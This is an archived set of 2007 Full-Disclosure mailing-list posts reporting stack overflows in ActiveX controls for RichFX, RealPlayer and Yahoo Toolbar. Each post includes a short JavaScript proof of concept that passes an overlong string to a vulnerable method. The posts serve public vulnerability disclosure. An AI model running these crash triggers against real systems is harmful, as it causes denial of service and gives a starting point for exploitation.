[Full-disclosure] RichFX nprfxins.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad

There are multiple stack overflows in the RichFX nprfxins.dll ActiveX Control. 
I almost positive that this control was installed with RealNetworks RealPlayer. 
This was tested on Windows XP SP2 fully patched and IE6. This control is marked 
safe for scripting. I have not tested code execution. PoC as follows:




 
  
function Check() {
var s = "";

while (s.length < 99) s=s+s;

 var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); 
//{47F59200-8783-11D2-8343-00A0C945A819}


 obj.DoInstall(s);   
 obj.QueryComponents(s);

   }
  

 
 

 
 




Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad

Supposedly Real fixed the Import() method overflow in October, 
http://secunia.com/advisories/27248/, I guess not, or it is no longer 
exploitable(I haven't tested it). Anyhow, that still leaves the ones that 
Shinnai found among others, and the PlayerProperty() method that I posted 
yesterday. 

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-26 Thread Elazar Broad

After some creative Googling, I am revising my original post. I believe that 
the Import() method overflow that I originally posted is really 
http://www.securityfocus.com/bid/26130, although I am not sure why Linux is 
listed under the "Vulnerable" section, so I am taking it out of the PoC code. 
Real claims to have patched this back in October, but I can still throw a stack 
overflow exception via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this vulnerability 
as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method 
Stack Overflow, and it might be wise to list this under a separate BID. PoC as 
follows:

-


 
  
function Check() {
var s = "";

while (s.length < 99) s=s+s;

 var obj = new ActiveXObject("IERPCTL.IERPCTL"); 
//{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
   
  var obj2 = obj.PlayerProperty(s);


   }
  

 
 

 
 
-

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-27 Thread Elazar Broad

Ouch is right.. I know I confused alot of people, I apologize for that. Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own BID, http://www.securityfocus.com/bid/26586. I have been in contact with Symantec's DeepSight team, and it looks like the Import() function will still throw a stack overflow exception, however it does not appear to overwrite the EIP, making it a plain old DoS attack. I believe they plan to post a write-up on this.Elazar-Original Message-
From: James Matthews <[EMAIL PROTECTED]>
Sent: Nov 26, 2007 7:24 PM
To: Elazar Broad <[EMAIL PROTECTED]>
Cc: "full-disclosure@lists.grok.org.uk" 
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

Ouch! On Nov 26, 2007 9:15 PM, Elazar Broad <[EMAIL PROTECTED]> wrote:
After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130
, although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer 
ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:-
   <br>    function Check() {<br>    var s = "";<br><br>    while (s.length < 99) s=s+s;<br><br>     var obj = new ActiveXObject("
IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}<br><br>      var obj2 = obj.PlayerProperty(s);<br><br><br>   }<br>    
 -Elazar___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- 
http://www.goldwatches.com/coupons/http://www.jewelerslounge.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS

2007-11-30 Thread Elazar Broad

There is a stack overflow in the c() method of the Yahoo Toobar Helper class. 
This overflow does not appear to get anywhere near the EIP or SEH. PoC as 
follows:

--


 
  
function Check() {
var s = "";

 while (s.length < 99) s=s+s;

 var obj = new ActiveXObject("yt.ythelper.2"); 
//{02478D38-C3F9-4EFB-9B51-7695ECA05670}
  obj.c(s);
   }
  

 
 
 

--

Elazar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

1 2 >

1 - 100 of 127 matches

Mail list logo